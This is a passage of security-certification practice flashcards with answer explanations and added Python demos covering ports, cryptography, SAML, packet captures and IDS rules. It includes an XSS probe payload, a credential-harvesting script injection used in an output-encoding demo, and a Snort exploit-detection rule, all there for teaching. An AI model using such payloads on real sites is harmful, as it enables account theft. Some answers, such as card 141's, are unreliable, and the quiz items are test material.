Force the use of a local client certificate for authentication with the server

A

Block all unused ports on the switch, router, and firewall / Logically place the Windows 2019 server into the network’s DMZ

OBJ-2.1: To best secure the server, you should logically place the Windows 2019 server into the network’s DMZ and block all unused ports on the switch, router, and firewall. Since the server will be used to allow remote connections from across the internet to access the server directly, the server must be placed into the De-Militarized Zone (DMZ) of the network and not in the internal trusted portion of the network. Additionally, any server or services that are going to be forward-facing to the internet (like a Remote Desktop Services server) should have all of the unused ports blocked on the switch, router, and firewall to minimize the footprint of the network. By blocking unused ports, there are fewer ways for an attacker to get into the network and to attack the server.

111
Q

You are working for a government contractor who requires all users to use a PIV device when sending digitally signed and encrypted emails. Which of the following physical security measures is being implemented?

Biometric reader
Cable lock
Key fob
Smart card

A

Smart card

OBJ-4.1: A smart card is used in applications that need to protect personal information and/or deliver fast, secure transactions, such as transit fare payment cards, government and corporate identification cards, documents such as electronic passports and visas, and financial payment cards. Often, smart cards are used as part of a multifactor authentication system where both the smart card and a PIN need to be presented for system authentication to occur.

112
Q

Which of the following cryptographic algorithms is classified as symmetric?

PGP
ECC
3DES
RSA

A

3DES

OBJ-6.2: Triple DES (3DES) is a symmetric-key block cipher that applies the DES cipher algorithm three times to each data block to increase its security over DES. RSA, PGP, and ECC are all asymmetric algorithms.

113
Q

Dion Training is using an authentication protocol to connect a network client to a networked file server by providing its authentication credentials. The file server then uses the authentication credentials to issue an authentication request to the server running this protocol. The server then is able to exchange authentication messages with the file server on behalf of the client. Throughout this process, a shared secret is used to protect the communication. Which of the following technologies relies upon the shared secret?

LDAP
PKI
Kerberos
RADIUS

A

RADIUS

OBJ-4.2: Remote Authentication Dial-In User Service (RADIUS) is a networking protocol, operating on port 1812, that provides centralized Authentication, Authorization, and Accounting (AAA or Triple A) management for users who connect to and use a network service. The RADIUS protocol utilizes an obfuscated password that is created from the shared secret and creates an MD5 hash of the authentication request to protect the communications.

114
Q

Your company just installed a new webserver within your DMZ. You have been asked to open up the port for secure web browsing on the firewall. Which port should you set as open to allow users to access this new server?

80
143
21
443

A

443

OBJ-2.6: Port 443 is used for HTTPS traffic. Therefore, this port must be opened. This is secure web browsing over SSL or TLS. Port 21 is used for the File Transfer Protocol (FTP). Port 80 is used for unsecured web browsing (HTTP). Port 143 is used for the Internet Message Access Protocol (IMAP).

115
Q

An employee contacts the service desk because they are unable to open an attachment they received in their email. The service desk agent conducts a screen sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and that a black pop-up window appears and then disappears quickly when the attachment is double-clicked. Which of the following is most likely causing this issue?

The email is a form of spam and should be deleted

The file contains an embedded link to a malicious website

The attachment is using a double file extension to mask its identity

The user doesn’t have a PDF reader installed on their computer

A

The attachment is using a double file extension to mask its identity

OBJ-1.2: The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black pop-up window that appeared and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link, since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

116
Q

You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal?

MAC filtering
VLAN
WPA2
VPN

A

VLAN

OBJ-3.2: A virtual local area network (VLAN) is a type of network segmentation that is configured in your network switches and prevents communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual networks’ data. A virtual private network (VPN) is a type of remote access capability used to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

117
Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

Buffer overflow
Denial of service
Cross-site scripting
SQL injection

A

SQL injection

OBJ-1.2: A SQL injection poses the most direct and most impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to the disclosure of sensitive information. A buffer overflow attack attempts to overwrite the memory buffer in order to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to cause a disclosure of information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for the running of other malicious code. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack is typically focused against the user, not the server or database.

118
Q

What access control model will a network switch utilize if it requires multilayer switches to use authentication via RADIUS/TACACS+?

802.1q
802.11ac
802.1x
802.3af

A

802.1x

OBJ-6.3: If you are using RADIUS/TACACS+ with the switch, you will need to use 802.1x for the protocol.

119
Q

You have run a vulnerability scan and received the following output:

CVE-2011-3389 QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES”

Which of the following categories should this be classified as?

Web application cryptography vulnerability
PKI transfer vulnerability
Active Directory encryption vulnerability
VPN tunnel vulnerability

A

Web application cryptography vulnerability

OBJ-1.6: This vulnerability should be categorized as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger configuration should be used, such as forcing the use of AES.

120
Q

Which of the following cryptographic algorithms is classified as asymmetric?

RC4
DES
Twofish
ECC

A

ECC

OBJ-6.2: Elliptic-curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. As a public-key cryptosystem, it relies on an asymmetric algorithm. Twofish, RC4, and DES are all symmetric algorithms.

121
Q

Dion Training wants to implement a technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST?

Host-based firewall
Anti-malware solution
Intrusion detection system
Application whitelisting

A

Application whitelisting

OBJ-3.3: Application whitelisting will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server, but again, it wouldn’t prevent an infection or prevent the malware from executing. An anti-malware solution is a good investment towards improving your security, but since the threat is a zero-day virus, an anti-malware solution will not be able to detect it using its signature database.

122
Q

An analyst just completed a port scan and received the following results of open ports:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
TCP: 80
TCP: 110
TCP: 443
TCP: 1433
TCP: 3306
TCP: 3389
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on these scan results, which of the following services are NOT currently operating?

RDP
Database
Web
SSH

A

SSH

OBJ-2.2: Based on the port numbers shown as open in the scan results, SSH is not currently operating. SSH listens on TCP port 22, which is absent. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL Server) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389. (Port 110 is POP3, which is not one of the answer choices.)

123
Q

A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ tcpdump -n -i eth0
15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 18060 win 16549
15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following statements is true based on this output?

10.0.19.121 is a client that is accessing an SSH server over port 52497

11.154.12.121 is a client that is accessing an SSH server over port 52497

11.154.12.121 is under attack from a host at 10.0.19.121

10.0.19.121 is under attack from a host at 11.154.12.121

A

10.0.19.121 is a client that is accessing an SSH server over port 52497

OBJ-2.2: This output from the tcpdump command displays three packets from a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) is running an SSH server on port 22; tcpdump has printed the port by its service name, ssh, rather than its number. This is based on the first line of the output, where the client (10.0.19.121) sends data from its ephemeral port 52497 to the server's SSH port. The second and third lines are the server responding and sending data back to the client on port 52497. There is no evidence of an attack against either the server or the client in this output, since we can see only the headers and not the content being exchanged.
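
As an added example (not part of the original flashcard), the Python below parses the three tcpdump lines from the card and applies the reasoning in the explanation: the endpoint that sits on a well-known port in every packet (ssh, 22) is the server, and the peer on the high ephemeral port (52497) is the client. It also totals the payload bytes in each direction from the P start:end(len) fields, something the explanation only describes qualitatively. The sample lines are copied from the card; the service-name table and the under-1024 heuristic are assumptions of the example.

```python
import re

# Sample input: the three tcpdump lines from the card (constructed, not a live capture).
SAMPLE_TCPDUMP = """\
15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 18060 win 16549
15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
"""

# tcpdump may print well-known ports as service names (as in the card's
# output); map the names we expect back to numbers (assumed table).
SERVICE_PORTS = {"ssh": 22, "telnet": 23, "domain": 53, "http": 80, "https": 443}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\w+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\w+): .*?\((?P<plen>\d+)\)"
)


def _port(token):
    return int(token) if token.isdigit() else SERVICE_PORTS[token]


def parse_tcpdump(text):
    """Return one dict per packet line: endpoints, ports and payload length."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip the command echo and anything we do not understand
            packets.append({
                "src": m["src"], "sport": _port(m["sport"]),
                "dst": m["dst"], "dport": _port(m["dport"]),
                "plen": int(m["plen"]),
            })
    return packets


def identify_roles(packets):
    """Return (server_ip, server_port, client_ip, client_port).

    Heuristic from the card's reasoning: the endpoint that sits on a
    well-known port (< 1024) in every packet is the server; the peer on a
    high ephemeral port is the client. Raises if the packets are ambiguous.
    """
    endpoints = set()
    for p in packets:
        endpoints.add((p["src"], p["sport"]))
        endpoints.add((p["dst"], p["dport"]))
    low = [ep for ep in endpoints if ep[1] < 1024]
    high = [ep for ep in endpoints if ep[1] >= 1024]
    if len(low) != 1 or len(high) != 1:
        raise ValueError("cannot determine client/server roles from these packets")
    return low[0] + high[0]


def bytes_by_direction(packets, server_ip):
    """Payload bytes each way, taken from the 'P start:end(len)' field."""
    totals = {"client_to_server": 0, "server_to_client": 0}
    for p in packets:
        key = "client_to_server" if p["dst"] == server_ip else "server_to_client"
        totals[key] += p["plen"]
    return totals


def summarize(text):
    packets = parse_tcpdump(text)
    server_ip, server_port, client_ip, client_port = identify_roles(packets)
    names = {v: k for k, v in SERVICE_PORTS.items()}
    service = names.get(server_port, str(server_port))
    traffic = bytes_by_direction(packets, server_ip)
    return (f"{client_ip}:{client_port} is a client of the {service} server at "
            f"{server_ip}:{server_port}; {traffic['client_to_server']} bytes sent, "
            f"{traffic['server_to_client']} bytes received (headers only, no content visible)")


if __name__ == "__main__":
    print(summarize(SAMPLE_TCPDUMP))
```

The port heuristic is exactly what an analyst does by eye; it breaks down when both sides use high ports or when a service runs on a non-standard port, which is why the function refuses to guess rather than returning a wrong answer.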

124
Q

Which of the following hashing algorithms results in a 160-bit fixed output?

SHA-2
MD5
NTLM
RIPEMD

A

RIPEMD

OBJ-6.2: RIPEMD-160, the most widely used member of the RIPEMD family, produces a 160-bit digest. SHA-2 is a family whose members produce 224-, 256-, 384- or 512-bit outputs, none of them 160 bits. An NTLM hash is 128 bits (it is an MD4 digest of the password). MD5 produces a 128-bit digest.

125
Q

The management at Steven’s work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network?

A discovery scan using a port scanner

Router and switch-based MAC address reporting

Reviewing a central administration tool like
a SCCM

A physical survey

A

Router and switch-based MAC address reporting

OBJ-2.2: The best option is MAC address reporting coming from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port it is connected to on a network device.

126
Q

Which type of monitoring would utilize a network tap?

Router-based
Active
SNMP
Passive

A

Passive

OBJ-3.2: Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself. Active monitoring relies on the scanning of targeted systems, not a network tap. Router-based monitoring would involve looking over the router’s logs and configuration files. SNMP is used to monitor network devices, but is considered a form of active monitoring and doesn’t rely on network taps.

127
Q

Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed there has been a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events?

Rootkit
Cross-site scripting
Cross-site request forgery
SQL injection

A

Cross-site scripting

OBJ-1.2: This scenario is a textbook example of the effects of a cross-site scripting (XSS) attack. If the website's server-side code does not validate posted input and encode it on output, an attacker can post a script that, when other users view the page, creates a pop-up window asking for their credentials and sends the captured passwords to the attacker, who then uses them to compromise further accounts. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. XSS allows an attacker to execute arbitrary JavaScript within a victim user's browser (such as creating pop-ups), whereas CSRF allows an attacker to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. Nothing described in this scenario would indicate a CSRF, a rootkit, or an SQL injection.

128
Q

A corporate workstation was recently infected with malware. The malware was able to access the workstation’s credential store and steal all the usernames and passwords from the machine. Then, the malware began to infect other workstations on the network using the usernames and passwords it stole from the first workstation. The IT Director has directed its IT staff to come up with a plan to prevent this type of issue from occurring again in the future. Which of the following would BEST prevent this from reoccurring?

Install an anti-virus or anti-malware solution that uses heuristic analysis

Install a Unified Threat Management system on the network to monitor for suspicious traffic

Install a host-based intrusion detection system on all of the corporate workstations

Monitor all workstations for failed login attempts and forward them to a centralized SYSLOG server

A

Install an anti-virus or anti-malware solution that uses heuristic analysis

OBJ-2.1: The only solution provided that could STOP this from reoccurring would be to use an anti-virus or anti-malware solution with heuristic analysis. The other options might be able to monitor and detect the issue, but not stop it from spreading. Heuristic analysis is a method employed by many computer anti-virus programs designed to detect previously unknown computer viruses, as well as new variants of viruses already in the wild. This is behavior-based detection and prevention, so it should be able to detect the issue in the scenario provided and stop it from spreading throughout the network.

129
Q

Which role validates the user’s identity when using SAML for authentication?

User agent
SP
RP
IdP

A

IdP

OBJ-4.2: The IdP provides the validation of the user's identity. Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity of a user (the principal) can be trusted by the SP without the user having to authenticate directly with the SP. The principal's user agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal's credentials if they are not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

130
Q

You have been asked to determine if Dion Training’s webserver is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server?

Banner grabbing
Protocol analysis
Vulnerability scan
Passive scan

A

Banner grabbing

OBJ-2.2: Banner grabbing is conducted by actively connecting to the service, for example with telnet or netcat, and recording what it sends back. An SSH server announces itself as soon as the TCP connection is made with a banner of the form SSH-2.0-<software version>, which names the implementation and its version and sometimes hints at the operating system. This is the fastest and easiest way to determine the version of SSH running on this web server. A vulnerability scanner, a protocol analyzer, or a passive scan could also reveal the version, but these are more time consuming and not always accurate.

131
Q

Raj is working to deploy a new vulnerability scanner for an organization. He wants to verify the information he gets is the most accurate view of the configurations on the laptops of the organization’s traveling salespeople in order to determine if there are any configuration issues that could lead to new vulnerabilities. Which of the following technologies would work BEST to collect the configuration information in this situation?

Server-based scanning
Passive network monitoring
Non-credentialed scanning
Agent-based scanning

A

Agent-based scanning

OBJ-1.5: Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization’s network. These agent-based scans can be conducted when the laptop is offline, and then sent to a centralized server the next time the laptop is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring all require a continuous network connection in order for them to accurately collect the configurations of the devices.

132
Q

Which of the following cryptographic algorithms is classified as asymmetric?

PGP
AES
3DES
RC4

A

PGP

OBJ-6.2: Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions, and to increase the security of email communications. PGP is a hybrid cryptosystem: the data itself is encrypted with a symmetric session key, while that session key is protected, and messages are signed, with public-key cryptography. Because its key management and signatures rely on asymmetric algorithms, it is classified as asymmetric here. AES, RC4, and 3DES are all symmetric algorithms.

133
Q

Which of the following proprietary tools is used to create forensic disk images without making changes to the original evidence?

Memdump
FTK Imager
dd
Autopsy

A

FTK Imager

OBJ-5.5: FTK Imager can create perfect copies or forensic images of computer data without making changes to the original evidence. The forensic image is identical in every way to the original, including file slack and unallocated space or drive free space. The dd tool can also be used to create forensic images, but it is not a proprietary tool since it is open-source. Memdump is used to collect the content within RAM on a given host. Autopsy is a cross-platform, open-source forensic tool suite.

134
Q

An insurance company has developed a new web application to allow its customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and used MSSQL for its backend database. You have been able to locate an application's search form and introduced the following code in the search input field:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");> originalAttribute="SRC" originalPath="vbscript:msgbox("Vulnerable_to_Attack ");>"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application?

Cross-site scripting
Command injection
SQL injection
Cross-site request forgery

A

Cross-site scripting

OBJ-1.2: This is a form of cross-site scripting (XSS). Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A malicious website can transmit such commands in many ways; specially crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user's interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution, for example to dump the database contents to the attacker. Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.
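
The following Python is an added example, not code from the flashcards, covering both this card and card 127: the same reflected search page rendered once with the user's input dropped straight into the HTML (the XSS the card describes) and once with contextual output encoding. The two payloads are constructed for the demonstration: the IMG/vbscript probe from this card and a credential-harvesting form of the kind card 127 describes. The page template and the tag list are assumptions of the example.

```python
import html
import re

# Constructed attacker inputs (not real user data): the probe from this card
# and a credential-harvesting injection like the one card 127 describes.
PAYLOADS = [
    '<IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");>',
    "<script>document.body.innerHTML+='<form>Session expired, re-enter your "
    "password:<input name=p></form>'</script>",
]

# Assumed page template: the search term lands in an HTML text node.
TEMPLATE = "<p>You searched for: {term}</p>"


def render_vulnerable(term):
    """Reflects the search term into the page unchanged: reflected XSS."""
    return TEMPLATE.format(term=term)


def render_hardened(term):
    """Output-encodes for the HTML text context. '<', '>', '&' and quotes
    become entities, so the browser displays the payload as literal text and
    never parses it as a tag or attribute."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


# Tags a browser acts on; used only to make the difference observable below.
# A blocklist like this is not a defence; encoding on output is.
ACTIVE_TAG_RE = re.compile(r"<\s*(script|img|iframe|svg|form|object|embed)\b", re.IGNORECASE)


def contains_active_markup(page):
    """True if the rendered page still holds a tag the browser would act on."""
    return ACTIVE_TAG_RE.search(page) is not None


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("vulnerable:", render_vulnerable(payload))
        print("hardened:  ", render_hardened(payload))
```

Encoding has to match the output context: html.escape is correct for a text node or a quoted attribute, but a value placed inside a script block, a URL, or CSS needs that context's encoder instead. A Content-Security-Policy header that forbids inline script is a useful second layer, since it stops the injected script from running even if an encoding step is missed.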

135
Q

Which of the following cryptographic algorithms is classified as asymmetric?

Blowfish
Diffie-Hellman
RC4
AES

A

Diffie-Hellman

OBJ-6.2: Diffie-Hellman (DH) is a method of securely agreeing on a shared cryptographic key over a public channel and was one of the first public-key protocols. Each party combines its own private value with the other party's public value to arrive at the same shared secret, which is never transmitted. As a public-key protocol, it relies on an asymmetric algorithm. AES, RC4, and Blowfish are all symmetric algorithms.
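
As an added example, not from the original card, here is the exchange in Python with both parties' steps shown and the one validation check a receiver should apply to a peer's public value. The parameters (p = 2^127 - 1, g = 3) are toy values chosen for the demonstration and are far too small for real use.

```python
import secrets

# Toy group for demonstration only: p is the Mersenne prime 2**127 - 1 and
# g = 3. Real deployments use a standardized group (RFC 7919 ffdhe2048 or
# larger) or an elliptic-curve variant such as X25519; 127-bit parameters
# offer no security.
P = 2**127 - 1
G = 3


def keypair(p=P, g=G):
    """Private exponent a and public value A = g^a mod p."""
    priv = secrets.randbelow(p - 3) + 2          # 2 <= a <= p-2
    return priv, pow(g, priv, p)


def shared_secret(my_priv, peer_pub, p=P):
    """K = peer_pub^my_priv mod p, after rejecting degenerate public values
    (0, 1, p-1) that would force K into a trivial subgroup."""
    if not 1 < peer_pub < p - 1:
        raise ValueError("invalid peer public value")
    return pow(peer_pub, my_priv, p)


def exchange():
    """Both sides of the protocol. Alice sends A and Bob sends B over the
    public channel; each combines the other's public value with its own
    private exponent and arrives at the same K, which is never sent."""
    a, A = keypair()          # Alice
    b, B = keypair()          # Bob
    public_channel = {"A": A, "B": B}      # everything an eavesdropper sees, plus p and g
    k_alice = shared_secret(a, public_channel["B"])
    k_bob = shared_secret(b, public_channel["A"])
    return k_alice, k_bob


def exchange_agrees():
    k_alice, k_bob = exchange()
    return k_alice == k_bob


def accepts_peer_value(peer_pub, p=P):
    try:
        shared_secret(2, peer_pub, p)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("both sides derived the same key:", exchange_agrees())
```

The shared value K is normally not used as a key directly; it is fed through a key derivation function together with transcript data. Plain DH is also unauthenticated, which is why protocols such as TLS sign or otherwise bind the exchanged public values to the parties' identities.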

136
Q

Which of the following protocols could be used inside of a virtual system to manage and monitor the network?

SMTP
BGP
SNMP
EIGRP

A

SNMP

OBJ-2.6: SNMP is used to monitor and manage networks, both physical and virtual. SMTP is used for email. BGP and EIGRP are used for routing network data.

137
Q

You have been asked to install a computer in a public workspace. The computer should only be used by an authorized user. Which of the following security requirements should you implement to prevent unauthorized users from accessing the network with this computer?

Issue the same strong and complex password for all users

Disable single sign-on

Remove the guest account from the administrator group

Require authentication on wake-up

A

Require authentication on wake-up

OBJ-4.1: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and it goes to sleep, when another person tries to use the computer, it will ask for a username and password prior to granting them access to the network.

138
Q

You are an analyst and have been asked to review and categorize the following output from a packet analysis in Wireshark:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Source         Destination    Protocol  Length  Info
192.168.3.145  4.4.2.2        DNS       74      Standard query 0xaed A test.diontraining.com
4.4.2.2        192.168.3.145  DNS       90      Standard query response 0x3aed A test.diontraining.com A 173.12.15.23
192.168.3.145  173.12.15.23   TCP       78      48134 - 80 [SYN] seq=0 Win=65635 Len=0 MSS=1426 WS=16 TSVal=486234134 Tsecr=0 SACK_PERM=1
173.12.15.23   192.168.3.145  TCP       78      80 - 48134 [SYN,ACK] seq=0 Ack=1 Win=65535 Len=0 MSS=1426 WS=4 TSVal=0 Tsecr=0 SACK_PERM=1 a1=486234134 Tsecr=240612
192.168.3.145  192.168.3.255  NBNS      92      Name query NB WORKGROUP
34.250.23.14   192.168.3.145  TCP       60      443 - 48134 [RST] Seq=1 Win=0 Len=0
34.250.23.14   192.168.3.145  TCP       60      8080 - 48134 [RST] Seq=1 Win=0 Len=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on your review, what does this scan indicate?

173.12.15.23 might be infected and beaconing to a C2 server

192.168.3.145 might be infected with malware

173.12.15.23 might be infected with malware

This appears to be normal network traffic

192.168.3.145 might be infected and beaconing to a C2 server

A

This appears to be normal network traffic

OBJ-2.2: This appears to be normal network traffic. The first line shows a DNS lookup for a website (test.diontraining.com). The second line is the DNS server's response with the website's IP address. The third line begins a three-way handshake between the internal host and the website on port 80. The fourth line is the SYN-ACK from the website back to the internal host, the second step of that handshake. The fifth line is a standard Windows NetBIOS name query, broadcast within the local network to translate human-readable names to local IP addresses. The sixth and seventh lines are TCP RST packets from 34.250.23.14 (source ports 443 and 8080) to the internal host's port 48134: connections being reset with no payload (Len=0), not data being exchanged. None of this traffic appears suspicious.

139
Q

An analyst is reviewing the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors are able to access the internet. How can this type of attack be prevented from occurring in the future?

Enable WPA2 security on the open wireless network

Implement a VLAN to separate the HVAC control system from the open wireless network

Enable NAC on the open wireless network

Install an IDS to protect the HVAC system

A

Implement a VLAN to separate the HVAC control system from the open wireless network

OBJ-3.2: A VLAN segments network traffic, and placing the HVAC control system in a VLAN separate from the open wireless network, with no route between the two, stops users of the open network from even reaching the HVAC login page. NAC could check each machine connecting to the open wireless network for compliance or recognize 'known' machines, but compliant machines would still be given access to the entire network; and since this network exists for visitors, NAC would likely lock legitimate guests out. Enabling WPA2 would require a pre-shared key or credentials, which conflicts with the requirement that the network remain open. An IDS would detect the attempted logins but cannot prevent them; an IPS would be required to block them.

140
Q

Your company wants to provide a secure SSO solution for accessing both the corporate wireless network and its network resources. Which of the following technologies should be used?

WPA2
RADIUS
WEP
WPS

A

RADIUS

OBJ-6.3: With RADIUS and SSO configured, users on the network can provide their user credentials one time (when they initially connect to the wireless access point or another RADIUS client), and they are automatically authenticated to all of the network’s resources.

141
Q

[Image: eight security features shown as tiles: Network Sniffer, Cable Lock, Cellular Data, Host-based firewall, Location Tracking, CAT 5e STP, MDM, Remote wipe]

Using the image provided, select four security features that you should use with a workstation or laptop within your organization.

Remote wipe, Location tracking, Host-based firewall, Cable lock

CAT5e STP, Location tracking, Host-based firewall, Remote wipe

Cable lock, Network sniffer, Host-based firewall, Remote wipe

Host-based firewall, Network sniffer, Cable lock, CAT5e STP

A

Host-based firewall, Network sniffer, Cable lock, CAT5e STP

OBJ-3.9: A host-based firewall, a network sniffer, a cable lock, and CAT5e STP cables are all appropriate security features to use with a corporate workstation or laptop. With a host-based firewall (such as Windows Firewall) you can configure the workstation or laptop to block incoming or outgoing traffic on the device's network connection. With a network sniffer installed, you can capture traffic on the network for later analysis. A cable lock secures the workstation or laptop to a desk and deters theft of the device. A CAT 5e STP (shielded twisted pair) cable for the network connection minimizes the risk of EMI and reduces data emanations.

142
Q

You are reviewing a rule within your organization's IDS. You see the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any msg: "BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow: to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s=\s/"; byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; reference:cve,2016-8077; classtype: attempted-user; sid:65535;rev:1;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this rule, which of the following malicious packets would this IDS alert on?

Any malicious outbound packets
Any malicious inbound TCP packet
Any malicious inbound packets
Any malicious outbound TCP packet

A

Any malicious inbound TCP packet

OBJ-2.4: The rule header (the first part of the rule, before the options) is set to alert only on TCP packets. The source is $EXTERNAL_NET on $HTTP_PORTS and the destination is $HOME_NET on any port, so the traffic travels from outside into the protected network. The flow option is set to "to_client, established", which means only server-to-client traffic on connections that are already established is analyzed against this rule. Therefore, this rule will alert on an inbound malicious TCP packet, and only when the packet matches all the content conditions listed in the rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to be able to create your own IDS rules, but you should be able to read them and pick out generic content such as the protocol covered by the signature, the ports being analyzed, and the direction of flow.
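
As an added example, not part of the card, the Python below parses the rule's header and options well enough to answer the exam-style questions mechanically: which protocol, which direction relative to $HOME_NET, and whether only established sessions are inspected. The rule text is copied from the card (with straight quotes); the splitting logic is deliberately simple and is an assumption of the example, not Snort's own parser.

```python
import re

# The rule from the card, reproduced as constructed input with straight quotes.
RULE = (
    'alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any '
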